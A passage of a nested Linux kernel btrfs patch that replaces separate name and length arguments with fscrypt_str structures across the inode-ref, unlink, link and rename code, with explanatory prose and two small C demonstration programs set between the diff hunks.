+-			   const char *name, int name_len,
++			   struct btrfs_root *root, const struct fscrypt_str *name,
+ 			   u64 inode_objectid, u64 ref_objectid, u64 index)
+ {
+ 	struct btrfs_fs_info *fs_info = root->fs_info;
+@@ -311,7 +311,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	struct btrfs_inode_ref *ref;
+ 	unsigned long ptr;
+ 	int ret;
+-	int ins_len = name_len + sizeof(*ref);
++	int ins_len = name->len + sizeof(*ref);
+ 
+ 	key.objectid = inode_objectid;
+ 	key.offset = ref_objectid;
+@@ -327,7 +327,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	if (ret == -EEXIST) {
+ 		u32 old_size;
+ 		ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0],
+-						 name, name_len);
++						 name);
+ 		if (ref)
+ 			goto out;
+ 
+@@ -336,7 +336,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 		ref = btrfs_item_ptr(path->nodes[0], path->slots[0],
+ 				     struct btrfs_inode_ref);
+ 		ref = (struct btrfs_inode_ref *)((unsigned long)ref + old_size);
+-		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name->len);
+ 		btrfs_set_inode_ref_index(path->nodes[0], ref, index);
+ 		ptr = (unsigned long)(ref + 1);
+ 		ret = 0;
+@@ -344,7 +344,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 		if (ret == -EOVERFLOW) {
+ 			if (btrfs_find_name_in_backref(path->nodes[0],
+ 						       path->slots[0],
+-						       name, name_len))
++						       name))
+ 				ret = -EEXIST;
+ 			else
+ 				ret = -EMLINK;
+@@ -353,11 +353,11 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	} else {
+ 		ref = btrfs_item_ptr(path->nodes[0], path->slots[0],
+ 				     struct btrfs_inode_ref);
+-		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name->len);
+ 		btrfs_set_inode_ref_index(path->nodes[0], ref, index);
+ 		ptr = (unsigned long)(ref + 1);
+ 	}
+-	write_extent_buffer(path->nodes[0], name, ptr, name_len);
++	write_extent_buffer(path->nodes[0], name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(path->nodes[0]);
+ 
+ out:
+@@ -370,7 +370,6 @@ out:
+ 		if (btrfs_super_incompat_flags(disk_super)
+ 		    & BTRFS_FEATURE_INCOMPAT_EXTENDED_IREF)
+ 			ret = btrfs_insert_inode_extref(trans, root, name,
+-							name_len,
+ 							inode_objectid,
+ 							ref_objectid, index);
+ 	}
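
btrfs_del_inode_ref() and btrfs_del_inode_extref() above remove one
variable-length name from an item that packs several refs back to back:
memmove_extent_buffer() slides the tail over the victim and
btrfs_truncate_item() shrinks the item. A toy userspace model of that
sub-item deletion, assuming a plain char buffer in place of an extent
buffer:

#include <stdio.h>
#include <string.h>

/*
 * Toy model of deleting one variable-length sub-item from a packed
 * item: move the tail down over the victim, then shrink the item.
 * In btrfs this is memmove_extent_buffer() + btrfs_truncate_item().
 */
static size_t del_sub_item(char *item, size_t item_size,
			   size_t victim_off, size_t victim_len)
{
	memmove(item + victim_off,
		item + victim_off + victim_len,
		item_size - (victim_off + victim_len));
	return item_size - victim_len;	/* new item size */
}

int main(void)
{
	char item[] = "AAABBBBCC";	/* three packed sub-items */
	size_t size = sizeof(item) - 1;

	size = del_sub_item(item, size, 3, 4);	/* drop "BBBB" */
	printf("%.*s\n", (int)size, item);	/* prints AAACC */
	return 0;
}
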
+diff --git a/fs/btrfs/inode-item.h b/fs/btrfs/inode-item.h
+index a8fc16d0147f6..b80aeb7157010 100644
+--- a/fs/btrfs/inode-item.h
++++ b/fs/btrfs/inode-item.h
+@@ -64,33 +64,31 @@ int btrfs_truncate_inode_items(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_root *root,
+ 			       struct btrfs_truncate_control *control);
+ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
+-			   const char *name, int name_len,
++			   struct btrfs_root *root, const struct fscrypt_str *name,
+ 			   u64 inode_objectid, u64 ref_objectid, u64 index);
+ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
+-			   const char *name, int name_len,
+-			   u64 inode_objectid, u64 ref_objectid, u64 *index);
++			struct btrfs_root *root, const struct fscrypt_str *name,
++			u64 inode_objectid, u64 ref_objectid, u64 *index);
+ int btrfs_insert_empty_inode(struct btrfs_trans_handle *trans,
+ 			     struct btrfs_root *root,
+ 			     struct btrfs_path *path, u64 objectid);
+-int btrfs_lookup_inode(struct btrfs_trans_handle *trans, struct btrfs_root
+-		       *root, struct btrfs_path *path,
++int btrfs_lookup_inode(struct btrfs_trans_handle *trans,
++		       struct btrfs_root *root, struct btrfs_path *path,
+ 		       struct btrfs_key *location, int mod);
+ 
+ struct btrfs_inode_extref *btrfs_lookup_inode_extref(
+ 			  struct btrfs_trans_handle *trans,
+ 			  struct btrfs_root *root,
+ 			  struct btrfs_path *path,
+-			  const char *name, int name_len,
++			  const struct fscrypt_str *name,
+ 			  u64 inode_objectid, u64 ref_objectid, int ins_len,
+ 			  int cow);
+ 
+ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+-						   int slot, const char *name,
+-						   int name_len);
++						   int slot,
++						   const struct fscrypt_str *name);
+ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		struct extent_buffer *leaf, int slot, u64 ref_objectid,
+-		const char *name, int name_len);
++		const struct fscrypt_str *name);
+ 
+ #endif
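
With the header converted, the compiler now enforces what the old
prototypes could not: a length can no longer be paired with the wrong name
at a call site. A small sketch of the bug class the fscrypt_str signatures
close off (the struct here is again a simplified stand-in):

#include <stdio.h>
#include <string.h>

struct fscrypt_str {
	const char *name;
	unsigned int len;
};

/* Old-style API: nothing ties name_len to name at the call site. */
static void emit_old(const char *name, int name_len)
{
	printf("%.*s\n", name_len, name);
}

/* New-style API: the pair is bound together in one object. */
static void emit_new(const struct fscrypt_str *name)
{
	printf("%.*s\n", (int)name->len, name->name);
}

int main(void)
{
	const char *a = "snapshot";
	const char *b = "ref";
	struct fscrypt_str sb = { b, (unsigned int)strlen(b) };

	emit_old(a, strlen(b));	/* wrong pairing compiles: prints "sna" */
	emit_new(&sb);		/* the fields cannot be mixed up */
	return 0;
}
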
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 222068bf80031..4063447217f92 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3627,7 +3627,7 @@ void btrfs_run_delayed_iputs(struct btrfs_fs_info *fs_info)
+ 	spin_unlock(&fs_info->delayed_iput_lock);
+ }
+ 
+-/**
++/*
+  * Wait for flushing all delayed iputs
+  *
+  * @fs_info:  the filesystem
+@@ -4272,7 +4272,7 @@ int btrfs_update_inode_fallback(struct btrfs_trans_handle *trans,
+ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 				struct btrfs_inode *dir,
+ 				struct btrfs_inode *inode,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_rename_ctx *rename_ctx)
+ {
+ 	struct btrfs_root *root = dir->root;
+@@ -4290,8 +4290,7 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	di = btrfs_lookup_dir_item(trans, root, path, dir_ino,
+-				    name, name_len, -1);
++	di = btrfs_lookup_dir_item(trans, root, path, dir_ino, name, -1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto err;
+@@ -4319,12 +4318,11 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		}
+ 	}
+ 
+-	ret = btrfs_del_inode_ref(trans, root, name, name_len, ino,
+-				  dir_ino, &index);
++	ret = btrfs_del_inode_ref(trans, root, name, ino, dir_ino, &index);
+ 	if (ret) {
+ 		btrfs_info(fs_info,
+ 			"failed to delete reference to %.*s, inode %llu parent %llu",
+-			name_len, name, ino, dir_ino);
++			name->len, name->name, ino, dir_ino);
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto err;
+ 	}
+@@ -4345,10 +4343,8 @@ skip_backref:
+ 	 * operations on the log tree, increasing latency for applications.
+ 	 */
+ 	if (!rename_ctx) {
+-		btrfs_del_inode_ref_in_log(trans, root, name, name_len, inode,
+-					   dir_ino);
+-		btrfs_del_dir_entries_in_log(trans, root, name, name_len, dir,
+-					     index);
++		btrfs_del_inode_ref_in_log(trans, root, name, inode, dir_ino);
++		btrfs_del_dir_entries_in_log(trans, root, name, dir, index);
+ 	}
+ 
+ 	/*
+@@ -4366,7 +4362,7 @@ err:
+ 	if (ret)
+ 		goto out;
+ 
+-	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name_len * 2);
++	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name->len * 2);
+ 	inode_inc_iversion(&inode->vfs_inode);
+ 	inode_inc_iversion(&dir->vfs_inode);
+ 	inode->vfs_inode.i_ctime = current_time(&inode->vfs_inode);
+@@ -4379,10 +4375,11 @@ out:
+ 
+ int btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		       struct btrfs_inode *dir, struct btrfs_inode *inode,
+-		       const char *name, int name_len)
++		       const struct fscrypt_str *name)
+ {
+ 	int ret;
+-	ret = __btrfs_unlink_inode(trans, dir, inode, name, name_len, NULL);
++
++	ret = __btrfs_unlink_inode(trans, dir, inode, name, NULL);
+ 	if (!ret) {
+ 		drop_nlink(&inode->vfs_inode);
+ 		ret = btrfs_update_inode(trans, inode->root, inode);
+@@ -4418,29 +4415,39 @@ static int btrfs_unlink(struct inode *dir, struct dentry *dentry)
+ 	struct btrfs_trans_handle *trans;
+ 	struct inode *inode = d_inode(dentry);
+ 	int ret;
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		return ret;
++
++	/* This needs to handle no-key deletions later on */
+ 
+ 	trans = __unlink_start_trans(dir);
+-	if (IS_ERR(trans))
+-		return PTR_ERR(trans);
++	if (IS_ERR(trans)) {
++		ret = PTR_ERR(trans);
++		goto fscrypt_free;
++	}
+ 
+ 	btrfs_record_unlink_dir(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
+ 			0);
+ 
+-	ret = btrfs_unlink_inode(trans, BTRFS_I(dir),
+-			BTRFS_I(d_inode(dentry)), dentry->d_name.name,
+-			dentry->d_name.len);
++	ret = btrfs_unlink_inode(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
++				 &fname.disk_name);
+ 	if (ret)
+-		goto out;
++		goto end_trans;
+ 
+ 	if (inode->i_nlink == 0) {
+ 		ret = btrfs_orphan_add(trans, BTRFS_I(inode));
+ 		if (ret)
+-			goto out;
++			goto end_trans;
+ 	}
+ 
+-out:
++end_trans:
+ 	btrfs_end_transaction(trans);
+ 	btrfs_btree_balance_dirty(BTRFS_I(dir)->root->fs_info);
++fscrypt_free:
++	fscrypt_free_filename(&fname);
+ 	return ret;
+ }
+ 
+@@ -4453,12 +4460,17 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+-	const char *name = dentry->d_name.name;
+-	int name_len = dentry->d_name.len;
+ 	u64 index;
+ 	int ret;
+ 	u64 objectid;
+ 	u64 dir_ino = btrfs_ino(BTRFS_I(dir));
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		return ret;
++
++	/* This needs to handle no-key deletions later on */
+ 
+ 	if (btrfs_ino(inode) == BTRFS_FIRST_FREE_OBJECTID) {
+ 		objectid = inode->root->root_key.objectid;
+@@ -4466,15 +4478,18 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		objectid = inode->location.objectid;
+ 	} else {
+ 		WARN_ON(1);
++		fscrypt_free_filename(&fname);
+ 		return -EINVAL;
+ 	}
+ 
+ 	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
++	if (!path) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	di = btrfs_lookup_dir_item(trans, root, path, dir_ino,
+-				   name, name_len, -1);
++				   &fname.disk_name, -1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
+@@ -4500,8 +4515,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	 * call btrfs_del_root_ref, and it _shouldn't_ fail.
+ 	 */
+ 	if (btrfs_ino(inode) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID) {
+-		di = btrfs_search_dir_index_item(root, path, dir_ino,
+-						 name, name_len);
++		di = btrfs_search_dir_index_item(root, path, dir_ino, &fname.disk_name);
+ 		if (IS_ERR_OR_NULL(di)) {
+ 			if (!di)
+ 				ret = -ENOENT;
+@@ -4518,7 +4532,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	} else {
+ 		ret = btrfs_del_root_ref(trans, objectid,
+ 					 root->root_key.objectid, dir_ino,
+-					 &index, name, name_len);
++					 &index, &fname.disk_name);
+ 		if (ret) {
+ 			btrfs_abort_transaction(trans, ret);
+ 			goto out;
+@@ -4531,7 +4545,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	btrfs_i_size_write(BTRFS_I(dir), dir->i_size - name_len * 2);
++	btrfs_i_size_write(BTRFS_I(dir), dir->i_size - fname.disk_name.len * 2);
+ 	inode_inc_iversion(dir);
+ 	dir->i_mtime = current_time(dir);
+ 	dir->i_ctime = dir->i_mtime;
+@@ -4540,6 +4554,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		btrfs_abort_transaction(trans, ret);
+ out:
+ 	btrfs_free_path(path);
++	fscrypt_free_filename(&fname);
+ 	return ret;
+ }
+ 
+@@ -4553,6 +4568,7 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	struct btrfs_path *path;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 dir_id;
+ 	int ret;
+ 
+@@ -4563,7 +4579,7 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	/* Make sure this root isn't set as the default subvol */
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+ 	di = btrfs_lookup_dir_item(NULL, fs_info->tree_root, path,
+-				   dir_id, "default", 7, 0);
++				   dir_id, &name, 0);
+ 	if (di && !IS_ERR(di)) {
+ 		btrfs_dir_item_key_to_cpu(path->nodes[0], di, &key);
+ 		if (key.objectid == root->root_key.objectid) {
+@@ -4802,6 +4818,7 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	int err = 0;
+ 	struct btrfs_trans_handle *trans;
+ 	u64 last_unlink_trans;
++	struct fscrypt_name fname;
+ 
+ 	if (inode->i_size > BTRFS_EMPTY_DIR_SIZE)
+ 		return -ENOTEMPTY;
+@@ -4814,9 +4831,17 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 		return btrfs_delete_subvolume(dir, dentry);
+ 	}
+ 
++	err = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (err)
++		return err;
++
++	/* This needs to handle no-key deletions later on */
++
+ 	trans = __unlink_start_trans(dir);
+-	if (IS_ERR(trans))
+-		return PTR_ERR(trans);
++	if (IS_ERR(trans)) {
++		err = PTR_ERR(trans);
++		goto out_notrans;
++	}
+ 
+ 	if (unlikely(btrfs_ino(BTRFS_I(inode)) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID)) {
+ 		err = btrfs_unlink_subvol(trans, dir, dentry);
+@@ -4830,9 +4855,8 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	last_unlink_trans = BTRFS_I(inode)->last_unlink_trans;
+ 
+ 	/* now the directory is empty */
+-	err = btrfs_unlink_inode(trans, BTRFS_I(dir),
+-			BTRFS_I(d_inode(dentry)), dentry->d_name.name,
+-			dentry->d_name.len);
++	err = btrfs_unlink_inode(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
++				 &fname.disk_name);
+ 	if (!err) {
+ 		btrfs_i_size_write(BTRFS_I(inode), 0);
+ 		/*
+@@ -4851,7 +4875,9 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	}
+ out:
+ 	btrfs_end_transaction(trans);
++out_notrans:
+ 	btrfs_btree_balance_dirty(fs_info);
++	fscrypt_free_filename(&fname);
+ 
+ 	return err;
+ }
+@@ -5532,19 +5558,24 @@ no_delete:
+ static int btrfs_inode_by_name(struct inode *dir, struct dentry *dentry,
+ 			       struct btrfs_key *location, u8 *type)
+ {
+-	const char *name = dentry->d_name.name;
+-	int namelen = dentry->d_name.len;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_path *path;
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	int ret = 0;
++	struct fscrypt_name fname;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+ 		return -ENOMEM;
+ 
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		goto out;
++
++	/* This needs to handle no-key deletions later on */
++
+ 	di = btrfs_lookup_dir_item(NULL, root, path, btrfs_ino(BTRFS_I(dir)),
+-			name, namelen, 0);
++				   &fname.disk_name, 0);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
+@@ -5556,12 +5587,13 @@ static int btrfs_inode_by_name(struct inode *dir, struct dentry *dentry,
+ 		ret = -EUCLEAN;
+ 		btrfs_warn(root->fs_info,
+ "%s gets something invalid in DIR_ITEM (name %s, directory ino %llu, location(%llu %u %llu))",
+-			   __func__, name, btrfs_ino(BTRFS_I(dir)),
++			   __func__, fname.disk_name.name, btrfs_ino(BTRFS_I(dir)),
+ 			   location->objectid, location->type, location->offset);
+ 	}
+ 	if (!ret)
+ 		*type = btrfs_dir_type(path->nodes[0], di);
+ out:
++	fscrypt_free_filename(&fname);
+ 	btrfs_free_path(path);
+ 	return ret;
+ }
+@@ -5584,6 +5616,11 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	struct btrfs_key key;
+ 	int ret;
+ 	int err = 0;
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 0, &fname);
++	if (ret)
++		return ret;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path) {
+@@ -5606,12 +5643,11 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	leaf = path->nodes[0];
+ 	ref = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_root_ref);
+ 	if (btrfs_root_ref_dirid(leaf, ref) != btrfs_ino(BTRFS_I(dir)) ||
+-	    btrfs_root_ref_name_len(leaf, ref) != dentry->d_name.len)
++	    btrfs_root_ref_name_len(leaf, ref) != fname.disk_name.len)
+ 		goto out;
+ 
+-	ret = memcmp_extent_buffer(leaf, dentry->d_name.name,
+-				   (unsigned long)(ref + 1),
+-				   dentry->d_name.len);
++	ret = memcmp_extent_buffer(leaf, fname.disk_name.name,
++				   (unsigned long)(ref + 1), fname.disk_name.len);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -5630,6 +5666,7 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	err = 0;
+ out:
+ 	btrfs_free_path(path);
++	fscrypt_free_filename(&fname);
+ 	return err;
+ }
+ 
+@@ -6238,9 +6275,18 @@ int btrfs_new_inode_prepare(struct btrfs_new_inode_args *args,
+ 	struct inode *inode = args->inode;
+ 	int ret;
+ 
++	if (!args->orphan) {
++		ret = fscrypt_setup_filename(dir, &args->dentry->d_name, 0,
++					     &args->fname);
++		if (ret)
++			return ret;
++	}
++
+ 	ret = posix_acl_create(dir, &inode->i_mode, &args->default_acl, &args->acl);
+-	if (ret)
++	if (ret) {
++		fscrypt_free_filename(&args->fname);
+ 		return ret;
++	}
+ 
+ 	/* 1 to add inode item */
+ 	*trans_num_items = 1;
+@@ -6280,6 +6326,7 @@ void btrfs_new_inode_args_destroy(struct btrfs_new_inode_args *args)
+ {
+ 	posix_acl_release(args->acl);
+ 	posix_acl_release(args->default_acl);
++	fscrypt_free_filename(&args->fname);
+ }
+ 
+ /*
+@@ -6315,8 +6362,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ {
+ 	struct inode *dir = args->dir;
+ 	struct inode *inode = args->inode;
+-	const char *name = args->orphan ? NULL : args->dentry->d_name.name;
+-	int name_len = args->orphan ? 0 : args->dentry->d_name.len;
++	const struct fscrypt_str *name = args->orphan ? NULL : &args->fname.disk_name;
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(dir->i_sb);
+ 	struct btrfs_root *root;
+ 	struct btrfs_inode_item *inode_item;
+@@ -6417,7 +6463,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 			sizes[1] = 2 + sizeof(*ref);
+ 		} else {
+ 			key[1].offset = btrfs_ino(BTRFS_I(dir));
+-			sizes[1] = name_len + sizeof(*ref);
++			sizes[1] = name->len + sizeof(*ref);
+ 		}
+ 	}
+ 
+@@ -6456,10 +6502,12 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 			btrfs_set_inode_ref_index(path->nodes[0], ref, 0);
+ 			write_extent_buffer(path->nodes[0], "..", ptr, 2);
+ 		} else {
+-			btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++			btrfs_set_inode_ref_name_len(path->nodes[0], ref,
++						     name->len);
+ 			btrfs_set_inode_ref_index(path->nodes[0], ref,
+ 						  BTRFS_I(inode)->dir_index);
+-			write_extent_buffer(path->nodes[0], name, ptr, name_len);
++			write_extent_buffer(path->nodes[0], name->name, ptr,
++					    name->len);
+ 		}
+ 	}
+ 
+@@ -6520,7 +6568,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 		ret = btrfs_orphan_add(trans, BTRFS_I(inode));
+ 	} else {
+ 		ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode), name,
+-				     name_len, 0, BTRFS_I(inode)->dir_index);
++				     0, BTRFS_I(inode)->dir_index);
+ 	}
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+@@ -6549,7 +6597,7 @@ out:
+  */
+ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 		   struct btrfs_inode *parent_inode, struct btrfs_inode *inode,
+-		   const char *name, int name_len, int add_backref, u64 index)
++		   const struct fscrypt_str *name, int add_backref, u64 index)
+ {
+ 	int ret = 0;
+ 	struct btrfs_key key;
+@@ -6568,17 +6616,17 @@ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 	if (unlikely(ino == BTRFS_FIRST_FREE_OBJECTID)) {
+ 		ret = btrfs_add_root_ref(trans, key.objectid,
+ 					 root->root_key.objectid, parent_ino,
+-					 index, name, name_len);
++					 index, name);
+ 	} else if (add_backref) {
+-		ret = btrfs_insert_inode_ref(trans, root, name, name_len, ino,
+-					     parent_ino, index);
++		ret = btrfs_insert_inode_ref(trans, root, name,
++					     ino, parent_ino, index);
+ 	}
+ 
+ 	/* Nothing to clean up yet */
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = btrfs_insert_dir_item(trans, name, name_len, parent_inode, &key,
++	ret = btrfs_insert_dir_item(trans, name, parent_inode, &key,
+ 				    btrfs_inode_type(&inode->vfs_inode), index);
+ 	if (ret == -EEXIST || ret == -EOVERFLOW)
+ 		goto fail_dir_item;
+@@ -6588,7 +6636,7 @@ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	btrfs_i_size_write(parent_inode, parent_inode->vfs_inode.i_size +
+-			   name_len * 2);
++			   name->len * 2);
+ 	inode_inc_iversion(&parent_inode->vfs_inode);
+ 	/*
+ 	 * If we are replaying a log tree, we do not want to update the mtime
+@@ -6613,15 +6661,15 @@ fail_dir_item:
+ 		int err;
+ 		err = btrfs_del_root_ref(trans, key.objectid,
+ 					 root->root_key.objectid, parent_ino,
+-					 &local_index, name, name_len);
++					 &local_index, name);
+ 		if (err)
+ 			btrfs_abort_transaction(trans, err);
+ 	} else if (add_backref) {
+ 		u64 local_index;
+ 		int err;
+ 
+-		err = btrfs_del_inode_ref(trans, root, name, name_len,
+-					  ino, parent_ino, &local_index);
++		err = btrfs_del_inode_ref(trans, root, name, ino, parent_ino,
++					  &local_index);
+ 		if (err)
+ 			btrfs_abort_transaction(trans, err);
+ 	}
+@@ -6704,6 +6752,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	struct inode *inode = d_inode(old_dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
++	struct fscrypt_name fname;
+ 	u64 index;
+ 	int err;
+ 	int drop_inode = 0;
+@@ -6715,6 +6764,10 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	if (inode->i_nlink >= BTRFS_LINK_MAX)
+ 		return -EMLINK;
+ 
++	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &fname);
++	if (err)
++		goto fail;
++
+ 	err = btrfs_set_inode_index(BTRFS_I(dir), &index);
+ 	if (err)
+ 		goto fail;
+@@ -6741,7 +6794,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	set_bit(BTRFS_INODE_COPY_EVERYTHING, &BTRFS_I(inode)->runtime_flags);
+ 
+ 	err = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode),
+-			     dentry->d_name.name, dentry->d_name.len, 1, index);
++			     &fname.disk_name, 1, index);
+ 
+ 	if (err) {
+ 		drop_inode = 1;
+@@ -6765,6 +6818,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	}
+ 
+ fail:
++	fscrypt_free_filename(&fname);
+ 	if (trans)
+ 		btrfs_end_transaction(trans);
+ 	if (drop_inode) {
+@@ -9037,6 +9091,8 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	int ret;
+ 	int ret2;
+ 	bool need_abort = false;
++	struct fscrypt_name old_fname, new_fname;
++	struct fscrypt_str *old_name, *new_name;
+ 
+ 	/*
+ 	 * For non-subvolumes allow exchange only within one subvolume, in the
+@@ -9048,6 +9104,19 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	     new_ino != BTRFS_FIRST_FREE_OBJECTID))
+ 		return -EXDEV;
+ 
++	ret = fscrypt_setup_filename(old_dir, &old_dentry->d_name, 0, &old_fname);
++	if (ret)
++		return ret;
++
++	ret = fscrypt_setup_filename(new_dir, &new_dentry->d_name, 0, &new_fname);
++	if (ret) {
++		fscrypt_free_filename(&old_fname);
++		return ret;
++	}
++
++	old_name = &old_fname.disk_name;
++	new_name = &new_fname.disk_name;
++
+ 	/* close the race window with snapshot create/destroy ioctl */
+ 	if (old_ino == BTRFS_FIRST_FREE_OBJECTID ||
+ 	    new_ino == BTRFS_FIRST_FREE_OBJECTID)
+@@ -9115,10 +9184,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, dest,
+-					     new_dentry->d_name.name,
+-					     new_dentry->d_name.len,
+-					     old_ino,
++		ret = btrfs_insert_inode_ref(trans, dest, new_name, old_ino,
+ 					     btrfs_ino(BTRFS_I(new_dir)),
+ 					     old_idx);
+ 		if (ret)
+@@ -9131,10 +9197,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, root,
+-					     old_dentry->d_name.name,
+-					     old_dentry->d_name.len,
+-					     new_ino,
++		ret = btrfs_insert_inode_ref(trans, root, old_name, new_ino,
+ 					     btrfs_ino(BTRFS_I(old_dir)),
+ 					     new_idx);
+ 		if (ret) {
+@@ -9169,9 +9232,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	} else { /* src is an inode */
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(old_dir),
+ 					   BTRFS_I(old_dentry->d_inode),
+-					   old_dentry->d_name.name,
+-					   old_dentry->d_name.len,
+-					   &old_rename_ctx);
++					   old_name, &old_rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, root, BTRFS_I(old_inode));
+ 	}
+@@ -9186,9 +9247,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	} else { /* dest is an inode */
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(new_dir),
+ 					   BTRFS_I(new_dentry->d_inode),
+-					   new_dentry->d_name.name,
+-					   new_dentry->d_name.len,
+-					   &new_rename_ctx);
++					   new_name, &new_rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, dest, BTRFS_I(new_inode));
+ 	}
+@@ -9198,16 +9257,14 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(new_dir), BTRFS_I(old_inode),
+-			     new_dentry->d_name.name,
